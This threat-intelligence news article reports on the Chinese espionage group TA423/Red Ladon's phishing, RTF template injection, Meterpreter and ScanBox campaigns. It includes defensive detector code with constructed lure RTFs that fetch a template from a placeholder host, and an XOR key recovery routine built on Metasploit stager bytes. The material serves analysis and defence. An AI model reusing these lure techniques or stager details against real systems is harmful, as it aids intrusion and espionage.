Chinese hacker group TA423 targets Australian governmental entities, countries in South China Sea

Researchers at Proofpoint and PwC Threat Intelligence provided details of TA423/Red Ladon, a China-based, espionage-motivated threat actor with an international reach. The group maintains a heavy focus on the Asia Pacific region, Australian governmental entities, and companies and countries operating in the South China Sea, and has been active since 2013. The researchers also assess with moderate confidence that recent campaigns targeting the federal government, energy, and manufacturing sectors globally may represent the latest efforts of TA423/Red Ladon.

An April to June 2022 ScanBox campaign primarily targeted local and federal Australian governmental agencies, Australian news media companies, and global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea, the researchers said in a blog post. The targeted organizations include defense contractors, manufacturers, universities, government agencies, legal firms involved in diplomatic disputes, and foreign companies involved with Australasian policy or operations in the South China Sea.

“This demonstrated the co-mingling of targets involved in Australian governmental affairs as well as offshore energy production in the South China Sea,” according to a Proofpoint blog post. “Proofpoint previously observed similar targeting in June 2021 by TA423/Red Ladon, wherein the threat actor would deliver a downloader in DLL format via RTF template injection. The campaign showed a consistency of victimology spanning thirteen months and bridging diverse phishing tactics, techniques, and procedures (TTPs),” it added.

The researchers provided technical evolution of the observed campaigns in three phases. The first phase of the campaign covered March to September 2021, and consisted of phishing targeting users in Australia and Malaysia, the post said. “The emails delivered Zip Archive attachments containing RTF template injection files as well as in some cases simply RTF attachments (not contained in Zip archives). These files would retrieve either further Zip archives or macro-laden Word documents using RTF template injection which serve as a next stage downloader,” it added.  
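The RTF template injection described in the quoted passage works because Word honours the `\*\template` destination in an RTF file and fetches whatever it points at. As an added example (editor's code, not Proofpoint's or PwC's tooling), the Python below triages an attachment for that technique: it locates the `\*\template` group, undoes the RTF escapes a lure can use to hide the URL (`\'hh` hex escapes, escaped backslashes, inserted line breaks) and flags any HTTP, `file://` or UNC target. The three sample RTFs are constructed for the demonstration and the `.invalid` domain is a placeholder.

```python
import re

# Destination that tells Word where to fetch the attached template from.
TEMPLATE_RE = re.compile(rb"\\\*\\template\b")
# RTF escapes a lure can use to hide the URL: \'hh hex bytes, \\ \{ \}, and
# any other control word that Word ignores inside the URL.
ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})|\\([\\{}])|\\[a-zA-Z]+-?\d* ?")
# Anything that makes Word reach out: http(s), file:// or a UNC path (\\host\share).
REMOTE_RE = re.compile(rb"(?i)(?:https?://|file://|\\\\)[^\s\"{}]+")


def _group_body(data: bytes, pos: int) -> bytes:
    """Return the bytes from pos up to the '}' that closes the enclosing group."""
    depth, i, out = 0, pos, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\" and data[i + 1:i + 2] in (b"{", b"}", b"\\"):
            out += data[i:i + 2]          # escaped delimiter, not structural
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            if depth == 0:
                break                     # end of the \*\template group
            depth -= 1
        out += c
        i += 1
    return bytes(out)


def _decode_rtf_text(raw: bytes) -> bytes:
    """Resolve RTF escapes and drop whitespace so split or hex-encoded URLs reassemble."""
    def sub(m):
        if m.group(1):
            return bytes.fromhex(m.group(1).decode())   # \'68 -> b"h"
        if m.group(2):
            return m.group(2)                           # \\ -> \ , \{ -> {
        return b""                                      # stray control word
    return re.sub(rb"\s", b"", ESCAPE_RE.sub(sub, raw))


def scan_rtf(data: bytes) -> list:
    """Return the remote template targets found in an RTF blob (empty if clean)."""
    if not data.lstrip().startswith(b"{\\rt"):      # Word accepts a truncated header
        return []
    hits = []
    for m in TEMPLATE_RE.finditer(data):
        text = _decode_rtf_text(_group_body(data, m.end()))
        hits += [h.group(0).decode("latin-1") for h in REMOTE_RE.finditer(text)]
    return hits


# Constructed samples (not real lures): a benign local template, a plain
# injected URL, and the same URL hidden behind hex escapes and line breaks.
BENIGN = b"{\\rtf1\\ansi{\\*\\template c:\\\\templates\\\\letter.dotx}\\par hello}"
INJECTED = b"{\\rtf1\\ansi{\\*\\template http://news-example.invalid/a.dotm}\\par}"
OBFUSCATED = (b"{\\rtf1{\\*\\template \\'68\\'74\\'74\\'70\\'3a//\r\n"
              b"news-example\r\n.invalid/t.dotm}}")

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("injected", INJECTED), ("obfuscated", OBFUSCATED)):
        print(f"{name:10s} -> {scan_rtf(blob)}")
```

The decode step matters more than the pattern match: a `\*\template` string search on the raw file misses the hex-escaped variant, and a URL regex on the raw file misses a URL split across lines, so normalise first and match second. A hit on a remote target is a strong detonation candidate; a local path is normal Word behaviour.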

“Regardless of the nature of the downloader, the following stage payload would consist of a legitimate PE and a malicious DLL stager,” the researchers said. “This DLL stager is executed using DLL sideloading and communicates with a threat actor-controlled server to retrieve a response encoded with a single-byte XOR. The decoded response is Meterpreter shellcode which is executed on the victim’s machine.”  
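The single-byte XOR in the quoted passage is weak by design, and an analyst holding a captured C2 response can usually recover the key without the DLL stager. The Python below is an added example (editor's code, not Proofpoint's, PwC's or the actor's tooling): it assumes the decoded payload begins with the well-known prologue of Metasploit's Windows block_api stagers, which is how a Meterpreter stage is normally delivered, and brute-forces all 256 keys against that known plaintext. The sample response is constructed here by encoding such a prologue plus filler with key 0x5A; it is not functional shellcode.

```python
from typing import Optional, Tuple

# Well-known first bytes of Metasploit's Windows block_api stagers. None = wildcard.
PROLOGUES = {
    # x86: cld ; call <api_resolver>  (short forward call, high rel32 bytes are zero)
    "x86": [0xFC, 0xE8, None, 0x00, 0x00, 0x00],
    # x64: cld ; and rsp, -16 ; call <api_resolver>
    "x64": [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8],
}


def xor_single_byte(data: bytes, key: int) -> bytes:
    """Apply (or remove) a single-byte XOR; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def _matches(decoded: bytes, pattern) -> bool:
    return len(decoded) >= len(pattern) and all(
        p is None or b == p for b, p in zip(decoded, pattern))


def recover_key(encoded: bytes) -> Optional[Tuple[int, str]]:
    """Brute-force the 256 keys; return (key, arch) when the decoded prefix is a
    known stager prologue, else None (no guess without evidence)."""
    width = max(len(p) for p in PROLOGUES.values())
    for key in range(256):
        head = xor_single_byte(encoded[:width], key)
        for arch, pattern in PROLOGUES.items():
            if _matches(head, pattern):
                return key, arch
    return None


def decode_response(encoded: bytes) -> Tuple[int, str, bytes]:
    """Return (key, arch, shellcode); raise if nothing recognisable decodes."""
    found = recover_key(encoded)
    if found is None:
        raise ValueError("no single-byte XOR key yields a known stager prologue")
    key, arch = found
    return key, arch, xor_single_byte(encoded, key)


# Constructed C2 'response': the x86 prologue plus filler bytes, XOR-encoded
# with 0x5A. Not functional shellcode; it exists only to exercise the decoder.
SAMPLE_PLAIN = bytes.fromhex("fce88f000000") + bytes(range(0x10, 0x30))
SAMPLE_ENCODED = xor_single_byte(SAMPLE_PLAIN, 0x5A)

if __name__ == "__main__":
    key, arch, sc = decode_response(SAMPLE_ENCODED)
    print(f"key=0x{key:02x} arch={arch} first bytes={sc[:8].hex()}")
```

Shellcode has no fixed header like `MZ`, so key recovery needs some known plaintext; the `cld; call` and `cld; and rsp,-16` prologues are the usual anchor for Meterpreter stagers. If neither matches (a different encoder or a non-Metasploit payload), extend `PROLOGUES` with what the sideloaded DLL expects rather than accepting the first key that happens to produce printable text.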

“Similarly to ScanBox activity in April 2022 to June 2022, several of the domains utilized to deliver malware payloads and to communicate with threat actor C2 servers were themed around Australian news media,” the post added. “Most notably, the domains impersonated ‘The Australian’ and ‘Herald Sun.’”

The second observed phase of the campaign occurred in March this year and consisted of phishing campaigns that used RTF template injection attachments leveraging template URLs that were customized for each target. Despite returning the same payload to all victims, these URLs were distinct, with each including a victim ID number that correlated to the intended victims, allowing the threat actor to track active infections based on the initial URL beacons to the staging server.   

The researchers said that the third phase of the ongoing campaign, between April and June this year, consisted of malicious Australian media-themed URLs delivered in phishing emails. Some of these URLs were victim-specific, and they redirected users to a website posing as an Australian media outlet. While this version of ScanBox has been customized to download subsequent modules, it is unencoded and heavily resembles earlier versions of the standard ScanBox code base.

This phase of the campaign originated from Gmail and Outlook email addresses which Proofpoint assesses with moderate confidence were created by the threat actor, and utilized a variety of subjects including ‘Sick Leave,’ ‘User Research,’ and ‘Request Cooperation,’ the researchers said. The hacker would frequently pose as an employee of the fictional media publication ‘Australian Morning News,’ providing a URL to the malicious domain and soliciting targets to view its website or share research content that the website would publish.

In emails, the hacker claimed to be starting a ‘humble news website’ and solicited user feedback while providing a link to australianmorningnews[dot]com. “While this is not impersonating an existing Australian media publication, it does copy content from legitimate news publications (including the BBC and Sky News) which were then displayed when victims navigated to the website,” the post added.   

Proofpoint said that upon clicking the link and redirecting to the site, visitors were served the ScanBox framework. The impersonation of a fictional media publication local to targets of interest is a tactic that Proofpoint and PwC Threat Intelligence had previously observed being used in historic TA423/Red Ladon ScanBox campaigns identified preceding the Cambodian elections in 2018. “The content of the emails and the malicious URL technique reprised a technique previously observed in September 2021 TA423/Red Ladon campaigns detailed later in this blog, in which the threat actor impersonated Australian media publications with its malware delivery infrastructure,” it added.

PwC Threat Intelligence assesses it is highly likely that ScanBox is shared privately amongst multiple China-based threat actors. Other China-based groups that have been observed using ScanBox include Red Sylvan (a.k.a. APT3, Gothic Panda), Red Apollo (a.k.a. APT10, Stone Panda), Red Phoenix (a.k.a. APT27, Emissary Panda), TA423/Red Ladon (a.k.a. APT40, Leviathan, GADOLINIUM), Red Dev 16 (a.k.a. Evil Eye, Earth Empusa, Poison Carp), and TA413/White Dev 9 (a.k.a. LuckyCat).

“TA423/Red Ladon’s 2018 ScanBox activity targeting Cambodia involved domains masquerading as news websites and targeted high profile government entities, including the National Election Commission,” according to the researchers. “One of the ScanBox server domains used in that campaign, mlcdailynews[dot]com, hosted several articles about Cambodian affairs and US and East Asia relations, for which contents were copied from legitimate publications (Khmer Post, Asia Times, Reuters, Associated Press). These were likely used as lures in phishing emails to convince targets to follow malicious links to the actor-controlled ScanBox domain,” they added. 

The campaign has an international reach, but a heavy focus on the Asia Pacific region, Australian governmental entities, and companies and countries operating in the South China Sea, the post said. “In particular, Proofpoint has observed TA423/Red Ladon targeting entities directly involved with development projects in the South China Sea closely around the time of tensions between China and other countries related to development projects of high strategic importance, such as the Kasawari Gas field developed by Malaysia, and an offshore wind farm in the Strait of Taiwan,” it added. 

“From an operational perspective, other than its custom toolset and offensive security tools like Meterpreter, TA423/Red Ladon has also returned to ScanBox. The last time that TA423/Red Ladon was publicly documented using ScanBox was in 2018,” the researchers said. “While ScanBox activity has been reported more sporadically since its first appearance in 2014 and heavy use in 2015, it remains a tool available to and shared among China-based threat actors to selectively deploy in campaigns. We have observed TA423/Red Ladon using ScanBox, both in 2018 and 2022, in campaigns using an upcoming national election as a lure, wherein the threat actor built local news-themed malicious websites to draw targets to in order to infect them,” it added.

Following the U.S. Department of Justice indictment and public disclosure last July, Proofpoint analysts have not observed a distinct disruption of operational tempo specifically for phishing campaigns associated with TA423/Red Ladon, the post said. “While the indictment attributed this threat actor to a specific entity operating with the support of a Chinese state intelligence agency, the technical details included did not cover the tactics currently in use by the group in the wild. As a result, the group was free to continue its usage of novel phishing techniques like RTF Template Injection which began in early 2021 (before the indictment) and persisted through March 2022,” it added.  

Proofpoint and PwC collectively expect TA423/Red Ladon to continue pursuing its intelligence-gathering and espionage mission primarily targeting countries in the South China Sea, as well as further intrusions in Australia, Europe, and the U.S., the post said. 

Last month, Proofpoint researchers detailed the TA558 hacker group, a likely financially motivated small crime threat actor, which has been targeting hospitality, hotel, and travel organizations. The group’s target focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.
